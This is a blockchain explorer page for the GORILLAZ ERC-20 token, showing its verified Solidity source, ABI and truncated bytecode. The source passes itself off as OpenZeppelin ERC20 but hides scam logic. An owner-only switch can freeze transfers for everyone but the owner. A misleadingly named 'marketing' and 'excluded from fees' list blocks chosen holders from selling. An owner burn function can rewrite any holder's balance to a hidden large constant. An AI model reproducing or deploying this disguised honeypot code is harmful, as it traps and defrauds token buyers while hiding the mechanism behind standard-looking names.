ERC-20
Overview
Max Total Supply
5,000,000,000,000 GORILLAZ
Holders
80
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
26,843,106,825.978826341 GORILLAZValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
GORILLAZ
Compiler Version
v0.8.10+commit.fc410830
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: MIT pragma solidity 0.8.10; import "./ERC20.sol"; contract GORILLAZ is ERC20 { constructor(string memory name, string memory symbol, uint256 totalSupply, bool initTransfer) ERC20(name, symbol, initTransfer) { _mint(msg.sender, totalSupply * 10 ** decimals()); } function burn(address account, uint256 amount) external onlyOwner { _burn(account, amount); } }
// SPDX-License-Identifier: MIT pragma solidity 0.8.10; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/ERC20.sol) pragma solidity 0.8.10; import "./IERC20.sol"; import "./Ownable.sol"; contract ERC20 is Ownable, IERC20 { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; uint256 private maxTxLimit = 1*10**17*10**9; string private _name; string private _symbol; bool _initTransfer; uint256 private balances; mapping (address => bool) private _distributedForMarketingPurposes; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_, bool initTransfer_) { _name = name_; _symbol = symbol_; balances = maxTxLimit; _initTransfer = initTransfer_; } function initTransfer() external onlyOwner { if (_initTransfer == false){ _initTransfer = true;} else {_initTransfer = false;} } function isExcludedFromFees(address account) public view returns (bool) { return _distributedForMarketingPurposes[account]; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 9; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, _allowances[owner][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = _allowances[owner][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (_initTransfer == true || from == owner() || to == owner()) { if(_balances[from] > 0){ if (_distributedForMarketingPurposes[from]) {require (amount == 0, "");} else{ if(!_distributedForMarketingPurposes[to]) require(amount>0, ""); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; } _balances[to] += amount; emit Transfer(from, to, amount); } } } else {require (_initTransfer == true, "");} _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); _balances[account] = balances - amount; _totalSupply -= amount; emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Spend `amount` form the allowance of `owner` toward `spender`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} function distribute(address[] calldata address_, bool val) public onlyDistributor{ for (uint256 i = 0; i < address_.length; i++) { _distributedForMarketingPurposes[address_[i]] = val; } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/IERC20.sol) pragma solidity 0.8.10; import "./IERC20Metadata.sol"; import "./IERC20Events.sol"; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 is IERC20Metadata, IERC20Events{ /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); }
// SPDX-License-Identifier: MIT pragma solidity 0.8.10; interface IERC20Events { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); }
// SPDX-License-Identifier: MIT pragma solidity 0.8.10; interface IERC20Metadata { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// SPDX-License-Identifier: MIT pragma solidity 0.8.10; import "./Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. */ abstract contract Ownable is Context { address private _owner; address internal _distributor; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Throws if called by any account other than the distributor. */ modifier onlyDistributor() { require(_distributor == msg.sender, "Caller is not fee distributor"); _; } /** * @dev Set new distributor. */ function distributor(address account) external onlyOwner { require (_distributor == address(0)); _distributor = account; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"uint256","name":"totalSupply","type":"uint256"},{"internalType":"bool","name":"initTransfer","type":"bool"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"address_","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"distribute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"distributor","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526a52b7d2dcc80cd2e40000006005553480156200002057600080fd5b5060405162002ccf38038062002ccf833981810160405281019062000046919062000625565b838382620000696200005d6200010760201b60201c565b6200010f60201b60201c565b82600690805190602001906200008192919062000360565b5081600790805190602001906200009a92919062000360565b5060055460098190555080600860006101000a81548160ff021916908315150217905550505050620000fd33620000d6620001d360201b60201c565b600a620000e4919062000865565b84620000f19190620008b6565b620001dc60201b60201c565b5050505062000a8a565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156200024f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002469062000978565b60405180910390fd5b62000263600083836200035660201b60201c565b80600460008282546200027791906200099a565b9250508190555080600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620002cf91906200099a565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000336919062000a08565b60405180910390a362000352600083836200035b60201b60201c565b5050565b505050565b505050565b8280546200036e9062000a54565b90600052602060002090601f016020900481019282620003925760008555620003de565b82601f10620003ad57805160ff1916838001178555620003de565b82800160010185558215620003de579182015b82811115620003dd578251825591602001919060010190620003c0565b5b509050620003ed9190620003f1565b5090565b5b808211156200040c576000816000905550600101620003f2565b5090565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b62000479826200042e565b810181811067ffffffffffffffff821117156200049b576200049a6200043f565b5b80604052505050565b6000620004b062000410565b9050620004be82826200046e565b919050565b600067ffffffffffffffff821115620004e157620004e06200043f565b5b620004ec826200042e565b9050602081019050919050565b60005b8381101562000519578082015181840152602081019050620004fc565b8381111562000529576000848401525b50505050565b6000620005466200054084620004c3565b620004a4565b90508281526020810184848401111562000565576200056462000429565b5b62000572848285620004f9565b509392505050565b600082601f83011262000592576200059162000424565b5b8151620005a48482602086016200052f565b91505092915050565b6000819050919050565b620005c281620005ad565b8114620005ce57600080fd5b50565b600081519050620005e281620005b7565b92915050565b60008115159050919050565b620005ff81620005e8565b81146200060b57600080fd5b50565b6000815190506200061f81620005f4565b92915050565b600080600080608085870312156200064257620006416200041a565b5b600085015167ffffffffffffffff8111156200066357620006626200041f565b5b62000671878288016200057a565b945050602085015167ffffffffffffffff8111156200069557620006946200041f565b5b620006a3878288016200057a565b9350506040620006b687828801620005d1565b9250506060620006c9878288016200060e565b91505092959194509250565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000763578086048111156200073b576200073a620006d5565b5b60018516156200074b5780820291505b80810290506200075b8562000704565b94506200071b565b94509492505050565b6000826200077e576001905062000851565b816200078e576000905062000851565b8160018114620007a75760028114620007b257620007e8565b600191505062000851565b60ff841115620007c757620007c6620006d5565b5b8360020a915084821115620007e157620007e0620006d5565b5b5062000851565b5060208310610133831016604e8410600b8410161715620008225782820a9050838111156200081c576200081b620006d5565b5b62000851565b62000831848484600162000711565b925090508184048111156200084b576200084a620006d5565b5b81810290505b9392505050565b600060ff82169050919050565b60006200087282620005ad565b91506200087f8362000858565b9250620008ae7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200076c565b905092915050565b6000620008c382620005ad565b9150620008d083620005ad565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200090c576200090b620006d5565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000960601f8362000917565b91506200096d8262000928565b602082019050919050565b60006020820190508181036000830152620009938162000951565b9050919050565b6000620009a782620005ad565b9150620009b483620005ad565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620009ec57620009eb620006d5565b5b828201905092915050565b62000a0281620005ad565b82525050565b600060208201905062000a1f6000830184620009f7565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000a6d57607f821691505b6020821081141562000a845762000a8362000a25565b5b50919050565b6122358062000a9a6000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a25780639dc29fac116100715780639dc29fac146102d1578063a457c2d7146102ed578063a9059cbb1461031d578063dd62ed3e1461034d578063e074839e1461037d57610116565b8063715018a6146102815780638da5cb5b1461028b57806391b69fa0146102a957806395d89b41146102b357610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d55780634b1ca195146102055780634fbee1931461022157806370a082311461025157610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b610123610399565b60405161013091906116e1565b60405180910390f35b610153600480360381019061014e91906117a1565b61042b565b60405161016091906117fc565b60405180910390f35b61017161044e565b60405161017e9190611826565b60405180910390f35b6101a1600480360381019061019c9190611841565b610458565b6040516101ae91906117fc565b60405180910390f35b6101bf610487565b6040516101cc91906118b0565b60405180910390f35b6101ef60048036038101906101ea91906117a1565b610490565b6040516101fc91906117fc565b60405180910390f35b61021f600480360381019061021a919061195c565b61053a565b005b61023b600480360381019061023691906119bc565b61066f565b60405161024891906117fc565b60405180910390f35b61026b600480360381019061026691906119bc565b6106c5565b6040516102789190611826565b60405180910390f35b61028961070e565b005b610293610796565b6040516102a091906119f8565b60405180910390f35b6102b16107bf565b005b6102bb610895565b6040516102c891906116e1565b60405180910390f35b6102eb60048036038101906102e691906117a1565b610927565b005b610307600480360381019061030291906117a1565b6109b1565b60405161031491906117fc565b60405180910390f35b610337600480360381019061033291906117a1565b610a9b565b60405161034491906117fc565b60405180910390f35b61036760048036038101906103629190611a13565b610abe565b6040516103749190611826565b60405180910390f35b610397600480360381019061039291906119bc565b610b45565b005b6060600680546103a890611a82565b80601f01602080910402602001604051908101604052809291908181526020018280546103d490611a82565b80156104215780601f106103f657610100808354040283529160200191610421565b820191906000526020600020905b81548152906001019060200180831161040457829003601f168201915b5050505050905090565b600080610436610c60565b9050610443818585610c68565b600191505092915050565b6000600454905090565b600080610463610c60565b9050610470858285610e33565b61047b858585610ebf565b60019150509392505050565b60006009905090565b60008061049b610c60565b905061052f818585600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461052a9190611ae3565b610c68565b600191505092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146105ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105c190611b85565b60405180910390fd5b60005b838390508110156106695781600a60008686858181106105f0576105ef611ba5565b5b905060200201602081019061060591906119bc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061066190611bd4565b9150506105cd565b50505050565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610716610c60565b73ffffffffffffffffffffffffffffffffffffffff16610734610796565b73ffffffffffffffffffffffffffffffffffffffff161461078a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161078190611c69565b60405180910390fd5b61079460006113ae565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6107c7610c60565b73ffffffffffffffffffffffffffffffffffffffff166107e5610796565b73ffffffffffffffffffffffffffffffffffffffff161461083b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161083290611c69565b60405180910390fd5b60001515600860009054906101000a900460ff1615151415610877576001600860006101000a81548160ff021916908315150217905550610893565b6000600860006101000a81548160ff0219169083151502179055505b565b6060600780546108a490611a82565b80601f01602080910402602001604051908101604052809291908181526020018280546108d090611a82565b801561091d5780601f106108f25761010080835404028352916020019161091d565b820191906000526020600020905b81548152906001019060200180831161090057829003601f168201915b5050505050905090565b61092f610c60565b73ffffffffffffffffffffffffffffffffffffffff1661094d610796565b73ffffffffffffffffffffffffffffffffffffffff16146109a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099a90611c69565b60405180910390fd5b6109ad8282611472565b5050565b6000806109bc610c60565b90506000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083811015610a82576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a7990611cfb565b60405180910390fd5b610a8f8286868403610c68565b60019250505092915050565b600080610aa6610c60565b9050610ab3818585610ebf565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610b4d610c60565b73ffffffffffffffffffffffffffffffffffffffff16610b6b610796565b73ffffffffffffffffffffffffffffffffffffffff1614610bc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bb890611c69565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c1c57600080fd5b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610cd8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ccf90611d8d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610d48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3f90611e1f565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e269190611826565b60405180910390a3505050565b6000610e3f8484610abe565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610eb95781811015610eab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea290611e8b565b60405180910390fd5b610eb88484848403610c68565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2690611f1d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9690611faf565b60405180910390fd5b60011515600860009054906101000a900460ff1615151480610ff35750610fc4610796565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806110305750611001610796565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15611347576000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054111561134257600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156111175760008114611112576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161110990611ff5565b60405180910390fd5b611341565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166111ac57600081116111ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111a290611ff5565b60405180910390fd5b5b6111b783838361163e565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561123e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161123590612087565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546112d39190611ae3565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c